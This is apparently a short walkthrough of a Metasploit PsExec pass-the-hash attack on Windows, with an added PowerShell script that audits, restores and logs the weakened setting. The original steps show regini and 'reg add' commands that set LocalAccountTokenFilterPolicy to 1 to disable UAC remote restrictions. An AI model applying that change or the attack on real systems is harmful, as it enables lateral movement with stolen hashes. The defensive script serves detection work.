Metasploit PsExec pass the hash attack demonstration:
1. Open HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
2. Add a new DWORD (32-bit) value named “LocalAccountTokenFilterPolicy” and set it to 1
Using regini (it reads a script file; save the two lines below as, e.g., tokenfilter.txt and run: regini tokenfilter.txt):
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    LocalAccountTokenFilterPolicy = REG_DWORD 1
C:\Windows\system32>reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
The operation completed successfully.
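A defender-side companion to the steps above, added here as an example and not part of the original post: a PowerShell script that audits whether LocalAccountTokenFilterPolicy has been set to 1 (disabling UAC remote restrictions, which is what lets a local admin account's hash be used for a PsExec logon), restores the Windows default, and lists the NTLM network logons such a session leaves in the Security log. The function names are my own.

```powershell
# Added example, not part of the original post. Run in an elevated PowerShell
# session on the host being audited. Function names are my own.
$KeyPath   = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$ValueName = 'LocalAccountTokenFilterPolicy'

function Get-TokenFilterPolicyState {
    # Reports whether UAC remote restrictions are still in force. When the value
    # is absent or 0, local admin accounts (other than the built-in Administrator)
    # only get a filtered token over the network, which blocks the PsExec logon
    # shown above; a value of 1 hands them a full admin token remotely.
    $item = Get-ItemProperty -Path $KeyPath -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $item) {
        return [pscustomobject]@{ Present = $false; Value = $null; Risk = 'OK: remote restrictions enabled (default)' }
    }
    $v = [int]$item.$ValueName
    $risk = if ($v -eq 1) { 'HIGH: remote restrictions disabled' } else { 'OK: remote restrictions enabled' }
    return [pscustomobject]@{ Present = $true; Value = $v; Risk = $risk }
}

function Restore-TokenFilterPolicyDefault {
    # Undoes the 'reg add' from the walkthrough by deleting the override so the
    # Windows default applies again. Supports -WhatIf for a dry run.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess("$KeyPath\$ValueName", 'Remove registry value')) {
        Remove-ItemProperty -Path $KeyPath -Name $ValueName -ErrorAction SilentlyContinue
    }
}

function Get-RecentNtlmNetworkLogons {
    # Lists Security event 4624 entries with logon type 3 (network) and NTLM,
    # the shape a PsExec pass-the-hash logon leaves behind. A local account
    # logging on over the network from a workstation is the pattern to review.
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $data = @{}
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            if ($data.LogonType -eq '3' -and $data.AuthenticationPackageName -eq 'NTLM') {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Account = "$($data.TargetDomainName)\$($data.TargetUserName)"
                    Source  = $data.IpAddress
                }
            }
        }
}

Get-TokenFilterPolicyState
Get-RecentNtlmNetworkLogons -MaxEvents 200 | Format-Table -AutoSize
```

Run Restore-TokenFilterPolicyDefault -WhatIf first to preview the removal; without -WhatIf it deletes the override and the default filtered-token behaviour returns.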
I first used the existing shell to get a Windows command prompt shell:
After I added the registry value above and changed the registry value, I added a different user named “bedri”. I successfully made the pass the hash attack, as in the images below:
Thanks to Joseph McCray.